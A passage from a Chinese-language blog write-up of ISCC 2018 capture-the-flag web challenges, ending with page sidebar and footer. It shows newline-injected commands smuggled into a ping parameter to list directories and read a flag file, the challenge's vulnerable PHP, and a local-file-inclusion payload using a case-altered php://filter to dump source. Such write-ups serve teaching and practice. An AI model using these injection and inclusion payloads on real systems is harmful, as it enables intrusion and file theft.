<p><code>http://118.190.152.202:8018/?ip=118.190.152.202%0als</code>            index.php</p>
<p><code>http://118.190.152.202:8018/?ip=118.190.152.202%0acat index.php</code> </p>
<p>得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">''</span>,</span><br><span class="line">	<span class="string">';'</span> =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">'|'</span> =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">'-'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">'$'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">'('</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">')'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">'`'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">	<span class="string">'||'</span> =&gt; <span class="string">''</span>,</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$target = str_replace( array_keys( $substitutions ), $substitutions, $target );</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( stristr( php_uname( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) &#123;</span><br><span class="line">	<span class="comment">// Windows</span></span><br><span class="line">	$cmd = shell_exec( <span class="string">'ping  '</span> . $target );</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="comment">// *nix</span></span><br><span class="line">	$cmd = shell_exec( <span class="string">'ping  -c 1 '</span> . $target );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span>  <span class="string">"&#123;$cmd&#125;"</span>;</span><br></pre></td></tr></table></figure>
<p>没有flag，然后遍历目录</p>
<p><code>http://118.190.152.202:8018/?ip=8.8.8.8%0als%20/home</code>              flag</p>
<p><code>http://118.190.152.202:8018/?ip=8.8.8.8%0acat%20/home/flag</code> </p>
<p>flag: ISCC{8a8646c7a2fce16b166fbc68ca65f9e4}</p>
<h3 id="你能绕过吗-1"><a href="#你能绕过吗-1" class="headerlink" title="你能绕过吗?"></a>你能绕过吗?</h3><p>给大家安利一下我的师兄–<a href="http://d4rkd0g.github.io/" target="_blank" rel="noopener">一个既懂web又懂bin的废汪</a>  Orz… 没错，这道题是在师兄全程做出来的，我在旁边呐喊助威，23333…</p>
<p>题目地址：<a href="http://118.190.152.202:8008/" target="_blank" rel="noopener">http://118.190.152.202:8008/</a></p>
<p>大家应该和我一样看到这样的参数 <code>?f=articles&amp;id=4</code>，直觉性的猜测id处的SQLi</p>
<p>然而显注没有、布尔盲注、时间盲注通通测试失败，呃….，其实这是一道LFI本地文件包含，参数f处，接着我要写出师兄的思路</p>
<p>输入<code>http://118.190.152.202:8008/index.php?f=index&amp;id=4</code>，显示的是该网页无法正常运行，但是也同时也告诉我们index模块是存在的(这好像是废话。。。)，通过curl -v查看网页的加载情况，发现一直在循环加载<code>?f=articles&amp;id=4</code>。也就是说index.php是包含了article.php的。</p>
<p><img src="15.png" alt=""></p>
<p>于是开始LFI，测试<code>http://118.190.152.202:8008/index.php?f=php://filter/read=convert.base64-encode/resource=index.php&amp;id=4</code></p>
<p>发现error…，经测试发现是过滤了php，可以通过大小写绕过</p>
<p><code>http://118.190.152.202:8008/index.php?f=phP://filter/convert.base64-encode/resource=index&amp;id=4</code></p>
<p><img src="16.png" alt=""></p>
<p>base64解码得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment">#ISCC&#123;LFIOOOOOOOOOOOOOO&#125;</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'f'</span>]))&#123;</span><br><span class="line">        <span class="keyword">if</span>(strpos($_GET[<span class="string">'f'</span>],<span class="string">"php"</span>) !== <span class="keyword">False</span>)&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"error..."</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">include</span>($_GET[<span class="string">'f'</span>] . <span class="string">'.php'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="m3lon WeChat Pay">
        <p>WeChat Pay</p>
      </div>
    

    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/25/rblog-writeup/" rel="next" title="RCTF 2018 rblog writeup">
                <i class="fa fa-chevron-left"></i> RCTF 2018 rblog writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/05/29/RCTF-r-cursive-wp/" rel="prev" title="RCTF 2018 r-cursive wp">
                RCTF 2018 r-cursive wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMzYxOC8xMDE3Mw=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/UMR.png" alt="m3lon">
            
              <p class="site-author-name" itemprop="name">m3lon</p>
              <p class="site-description motion-element" itemprop="description">萌新一枚</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/Web安全/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lambdax.me/" title="Lambdax" target="_blank">Lambdax</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.51cto.com/skytina" title="skytina" target="_blank">skytina</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://idoge.cc/" title="Dik1s" target="_blank">Dik1s</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.cnblogs.com/iamstudy" title="l3m0n" target="_blank">l3m0n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://o0xmuhe.github.io/" title="0xmuhe" target="_blank">0xmuhe</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://k1n9.me/" title="k1n9" target="_blank">k1n9</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://stone.moe/" title="StoneMoe" target="_blank">StoneMoe</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://pi4net.com/" title="pi4net" target="_blank">pi4net</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#比较数字大小"><span class="nav-number">1.</span> <span class="nav-text">比较数字大小</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web01"><span class="nav-number">2.</span> <span class="nav-text">web01</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#为什么这么简单啊"><span class="nav-number">3.</span> <span class="nav-text">为什么这么简单啊</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web02"><span class="nav-number">4.</span> <span class="nav-text">web02</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Please-give-me-username-and-password"><span class="nav-number">5.</span> <span class="nav-text">Please give me username and password!</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php是世界上最好的语言"><span class="nav-number">6.</span> <span class="nav-text">php是世界上最好的语言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#一切都是套路"><span class="nav-number">7.</span> <span class="nav-text">一切都是套路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入的艺术"><span class="nav-number">8.</span> <span class="nav-text">SQL注入的艺术</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#试试看"><span class="nav-number">9.</span> <span class="nav-text">试试看</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Only-admin-can-see-flag"><span class="nav-number">10.</span> <span class="nav-text">Only admin can see flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#What-is-that？"><span class="nav-number">11.</span> <span class="nav-text">What is that？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#数字密文"><span class="nav-number">12.</span> <span class="nav-text">数字密文</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#秘密电报"><span class="nav-number">13.</span> <span class="nav-text">秘密电报</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#谍影重重"><span class="nav-number">14.</span> <span class="nav-text">谍影重重</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#有趣的ISCC"><span class="nav-number">15.</span> <span class="nav-text">有趣的ISCC</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#凯撒十三世"><span class="nav-number">16.</span> <span class="nav-text">凯撒十三世</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#一只猫的心思"><span class="nav-number">17.</span> <span class="nav-text">一只猫的心思</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#暴力XX不可取"><span class="nav-number">18.</span> <span class="nav-text">暴力XX不可取</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Where-is-the-FLAG？"><span class="nav-number">19.</span> <span class="nav-text">Where is the FLAG？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#你能跨过去吗"><span class="nav-number">20.</span> <span class="nav-text">你能跨过去吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Sqli"><span class="nav-number">21.</span> <span class="nav-text">Sqli</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#你能绕过吗"><span class="nav-number">22.</span> <span class="nav-text">你能绕过吗?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#你能绕过吗-1"><span class="nav-number">23.</span> <span class="nav-text">你能绕过吗?</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">m3lon</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  

  

  
  

  

  

  

</body>
</html>
